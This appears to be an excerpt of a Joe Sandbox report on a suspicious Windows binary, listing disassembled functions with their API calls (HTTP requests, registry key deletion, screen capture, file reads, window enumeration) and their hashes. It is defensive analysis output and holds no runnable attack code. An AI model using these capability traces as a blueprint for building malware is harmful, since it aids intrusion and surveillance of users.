                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007FC4B0
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007FC4C3
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007FC4D7
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007FC4F0
                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 007FC533
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007FC549
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007FC554
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007FC584
                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007FC5DC
                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007FC5F0
                                    • InternetCloseHandle.WININET(00000000), ref: 007FC5FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                    • String ID:
                                    • API String ID: 3800310941-3916222277
                                    • Opcode ID: 5dec7e92521e9a3b3fa250f7b6ad2f2372f47f5ebbf1f8979ee11712a54ece76
                                    • Instruction ID: 5be0a7f21dac74dfa25006430d1ab3fc3ce941134e29b1d408e376dff3137938
                                    • Opcode Fuzzy Hash: 5dec7e92521e9a3b3fa250f7b6ad2f2372f47f5ebbf1f8979ee11712a54ece76
                                    • Instruction Fuzzy Hash: 79514BB154020DBFEB228F64CA88ABB7BBCFF08754F108419FA5597250DB78E954DB60
                                    Function 0081856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00818592
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 008185A2
                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 008185AD
                                    • CloseHandle.KERNEL32(00000000), ref: 008185BA
                                    • GlobalLock.KERNEL32(00000000), ref: 008185C8
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 008185D7
                                    • GlobalUnlock.KERNEL32(00000000), ref: 008185E0
                                    • CloseHandle.KERNEL32(00000000), ref: 008185E7
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 008185F8
                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0081FC38,?), ref: 00818611
                                    • GlobalFree.KERNEL32(00000000), ref: 00818621
                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 00818641
                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00818671
                                    • DeleteObject.GDI32(00000000), ref: 00818699
                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008186AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                    • String ID:
                                    • API String ID: 3840717409-0
                                    • Opcode ID: b97846c50fae88637e23e043e6ce3f96eee7239bb4c0a438e45de928e83d257e
                                    • Instruction ID: 676342cc2c150be6285f988fe9ec30fe8ca758749c138ce93344e5085d4adcb7
                                    • Opcode Fuzzy Hash: b97846c50fae88637e23e043e6ce3f96eee7239bb4c0a438e45de928e83d257e
                                    • Instruction Fuzzy Hash: 4E412775640208EFDB119FA5DC89EEA7BBDFF99B11F108058F91AE7260DB309941CB60
                                    Function 007F14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(00000000), ref: 007F1502
                                    • VariantCopy.OLEAUT32(?,?), ref: 007F150B
                                    • VariantClear.OLEAUT32(?), ref: 007F1517
                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007F15FB
                                    • VarR8FromDec.OLEAUT32(?,?), ref: 007F1657
                                    • VariantInit.OLEAUT32(?), ref: 007F1708
                                    • SysFreeString.OLEAUT32(?), ref: 007F178C
                                    • VariantClear.OLEAUT32(?), ref: 007F17D8
                                    • VariantClear.OLEAUT32(?), ref: 007F17E7
                                    • VariantInit.OLEAUT32(00000000), ref: 007F1823
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                    • API String ID: 1234038744-3931177956
                                    • Opcode ID: 24bb6d13947f9c86042f8730e7019ebf16f61872cb6289b14403ed616fa3e7ba
                                    • Instruction ID: eba1b01c075a54210cb00c73ab576144c388951f3fb45e27e945ed7d3863d79b
                                    • Opcode Fuzzy Hash: 24bb6d13947f9c86042f8730e7019ebf16f61872cb6289b14403ed616fa3e7ba
                                    • Instruction Fuzzy Hash: 10D1E471A04119EBDF04EF65E889B7DB7B5BF44700F548056F606AB280DB38ED60EBA1
                                    Function 0080B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 0080C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0080B6AE,?,?), ref: 0080C9B5
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080C9F1
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA68
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0080B6F4
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0080B772
                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 0080B80A
                                    • RegCloseKey.ADVAPI32(?), ref: 0080B87E
                                    • RegCloseKey.ADVAPI32(?), ref: 0080B89C
                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0080B8F2
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0080B904
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0080B922
                                    • FreeLibrary.KERNEL32(00000000), ref: 0080B983
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0080B994
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 146587525-4033151799
                                    • Opcode ID: efdb9f2d0314fec3c5892f61a3599b3e34eb4df1205dcc245da19d66242d1ded
                                    • Instruction ID: 26b52abfc245b61996dd9c84d9f607b95576e65a23b31a986d42d5b9b0107aa2
                                    • Opcode Fuzzy Hash: efdb9f2d0314fec3c5892f61a3599b3e34eb4df1205dcc245da19d66242d1ded
                                    • Instruction Fuzzy Hash: 14C18D31208201EFD754DF14C895F2ABBE5FF84308F18855CE5AA8B2A2CB75ED45CB91
                                    Function 0080255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDC.USER32(00000000), ref: 008025D8
                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008025E8
                                    • CreateCompatibleDC.GDI32(?), ref: 008025F4
                                    • SelectObject.GDI32(00000000,?), ref: 00802601
                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0080266D
                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008026AC
                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008026D0
                                    • SelectObject.GDI32(?,?), ref: 008026D8
                                    • DeleteObject.GDI32(?), ref: 008026E1
                                    • DeleteDC.GDI32(?), ref: 008026E8
                                    • ReleaseDC.USER32(00000000,?), ref: 008026F3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 9bf1c54147f997efa6a3aa4dd9553cd82ed4819cd10f22c09ed5578dbd992a1d
                                    • Instruction ID: 5ec6f10ec4bd90c70bf6ced8dd8a1161e13894e42b77ee4d0d9658b0fdaa8783
                                    • Opcode Fuzzy Hash: 9bf1c54147f997efa6a3aa4dd9553cd82ed4819cd10f22c09ed5578dbd992a1d
                                    • Instruction Fuzzy Hash: 7961D275D00219EFCF04CFA8DC88AAEBBB9FF48310F208529E959A7250D775A951CF50
                                    Function 007BDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 007BDAA1
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD659
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD66B
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD67D
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD68F
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6A1
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6B3
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6C5
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6D7
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6E9
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD6FB
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD70D
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD71F
                                      • Part of subcall function 007BD63C: _free.LIBCMT ref: 007BD731
                                    • _free.LIBCMT ref: 007BDA96
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007BDAB8
                                    • _free.LIBCMT ref: 007BDACD
                                    • _free.LIBCMT ref: 007BDAD8
                                    • _free.LIBCMT ref: 007BDAFA
                                    • _free.LIBCMT ref: 007BDB0D
                                    • _free.LIBCMT ref: 007BDB1B
                                    • _free.LIBCMT ref: 007BDB26
                                    • _free.LIBCMT ref: 007BDB5E
                                    • _free.LIBCMT ref: 007BDB65
                                    • _free.LIBCMT ref: 007BDB82
                                    • _free.LIBCMT ref: 007BDB9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 3f5418eeb7e9847d1af71a7a1b4acdfd1a5687e2a7a9eb5242f356f00fbbdeb5
                                    • Instruction ID: 34aeddf66570b1d4234b0de54f4146845b596eaf36cbba8d23f1d9ceaf0df4e7
                                    • Opcode Fuzzy Hash: 3f5418eeb7e9847d1af71a7a1b4acdfd1a5687e2a7a9eb5242f356f00fbbdeb5
                                    • Instruction Fuzzy Hash: C0314C71605205EFEB31AA79E849BD7B7E9FF00310F154829E449E71A2EE39BC418B24
                                    Function 007E365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 007E369C
                                    • _wcslen.LIBCMT ref: 007E36A7
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007E3797
                                    • GetClassNameW.USER32(?,?,00000400), ref: 007E380C
                                    • GetDlgCtrlID.USER32(?), ref: 007E385D
                                    • GetWindowRect.USER32(?,?), ref: 007E3882
                                    • GetParent.USER32(?), ref: 007E38A0
                                    • ScreenToClient.USER32(00000000), ref: 007E38A7
                                    • GetClassNameW.USER32(?,?,00000100), ref: 007E3921
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 007E395D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                    • String ID: %s%u
                                    • API String ID: 4010501982-679674701
                                    • Opcode ID: a832563f8b538356e13c0b76fb96bd4aac9297f400f8a34344991a1ea69a71e5
                                    • Instruction ID: 30cfce6f2f77e96e21fed3dc2d00defa9b0d66cbc269170e04f78d58f15f1506
                                    • Opcode Fuzzy Hash: a832563f8b538356e13c0b76fb96bd4aac9297f400f8a34344991a1ea69a71e5
                                    • Instruction Fuzzy Hash: 9291D471201346EFD708DF26C889BEAB7A8FF48314F008619F999C3191DB38EA45CB91
                                    Function 007E4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000400), ref: 007E4994
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 007E49DA
                                    • _wcslen.LIBCMT ref: 007E49EB
                                    • CharUpperBuffW.USER32(?,00000000), ref: 007E49F7
                                    • _wcsstr.LIBVCRUNTIME ref: 007E4A2C
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007E4A64
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 007E4A9D
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007E4AE6
                                    • GetClassNameW.USER32(?,?,00000400), ref: 007E4B20
                                    • GetWindowRect.USER32(?,?), ref: 007E4B8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                    • String ID: ThumbnailClass
                                    • API String ID: 1311036022-1241985126
                                    • Opcode ID: 2458d169fd6dc9faf39f0a4a4a2d00b72d7034c5964d1872d41276178ccc61cb
                                    • Instruction ID: f42a206043d1f56f9e9bfb6d9f834002c4eb867db1903a067a24942524685568
                                    • Opcode Fuzzy Hash: 2458d169fd6dc9faf39f0a4a4a2d00b72d7034c5964d1872d41276178ccc61cb
                                    • Instruction Fuzzy Hash: 4691BE720062459FDB04DF16C989FAA77E8FF88314F048469FD859A096EB38ED45CBA1
                                    Function 0080CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0080CC64
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0080CC8D
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0080CD48
                                      • Part of subcall function 0080CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0080CCAA
                                      • Part of subcall function 0080CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0080CCBD
                                      • Part of subcall function 0080CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0080CCCF
                                      • Part of subcall function 0080CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0080CD05
                                      • Part of subcall function 0080CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0080CD28
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0080CCF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2734957052-4033151799
                                    • Opcode ID: 331c12cd152bb571e25f9f84d63b24285be65a6ffeff3e4c37486ee6192c0746
                                    • Instruction ID: 6a1abb1dc0bc24c3d9e166e39053f442f9395167005d96a78721788d84e6f96d
                                    • Opcode Fuzzy Hash: 331c12cd152bb571e25f9f84d63b24285be65a6ffeff3e4c37486ee6192c0746
                                    • Instruction Fuzzy Hash: 14316E72A41129BBDB608F54DC88EFFBB7CFF45750F004265A905E2290DB349E459AA0
                                    Function 007F3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007F3D40
                                    • _wcslen.LIBCMT ref: 007F3D6D
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 007F3D9D
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007F3DBE
                                    • RemoveDirectoryW.KERNEL32(?), ref: 007F3DCE
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007F3E55
                                    • CloseHandle.KERNEL32(00000000), ref: 007F3E60
                                    • CloseHandle.KERNEL32(00000000), ref: 007F3E6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                    • String ID: :$\$\??\%s
                                    • API String ID: 1149970189-3457252023
                                    • Opcode ID: 3a302c7cdb725c040ab0290d91f02409832c5c3f86e27d443026950bf7cb4bd5
                                    • Instruction ID: 8abdcdfbe5cbc52eaf438c2fe6ff640aeb655fe21111070f61adf1fa4324fd50
                                    • Opcode Fuzzy Hash: 3a302c7cdb725c040ab0290d91f02409832c5c3f86e27d443026950bf7cb4bd5
                                    • Instruction Fuzzy Hash: 0031A171A40219ABDB209BA0DC49FEF77BDFF89740F1041B5F619D6260EB7897448B24
                                    Function 007EE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • timeGetTime.WINMM ref: 007EE6B4
                                      • Part of subcall function 0079E551: timeGetTime.WINMM(?,?,007EE6D4), ref: 0079E555
                                    • Sleep.KERNEL32(0000000A), ref: 007EE6E1
                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 007EE705
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007EE727
                                    • SetActiveWindow.USER32 ref: 007EE746
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007EE754
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 007EE773
                                    • Sleep.KERNEL32(000000FA), ref: 007EE77E
                                    • IsWindow.USER32 ref: 007EE78A
                                    • EndDialog.USER32(00000000), ref: 007EE79B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: 7eb375cbd0ed0e8d8f374257e861632d11efc2ff782c4ec9a823ea0f63782c5a
                                    • Instruction ID: 45814ace6aaa5b639326421dbecb5be1c2096af47aba5e557e81668ccc380abf
                                    • Opcode Fuzzy Hash: 7eb375cbd0ed0e8d8f374257e861632d11efc2ff782c4ec9a823ea0f63782c5a
                                    • Instruction Fuzzy Hash: 1F2178B0241385AFEB009F61EC8DB653BAEFB6978AF104825F515C22B1DF7D9C508B15
                                    Function 007EE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007EEA5D
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007EEA73
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007EEA84
                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007EEA96
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007EEAA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: SendString$_wcslen
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2420728520-1007645807
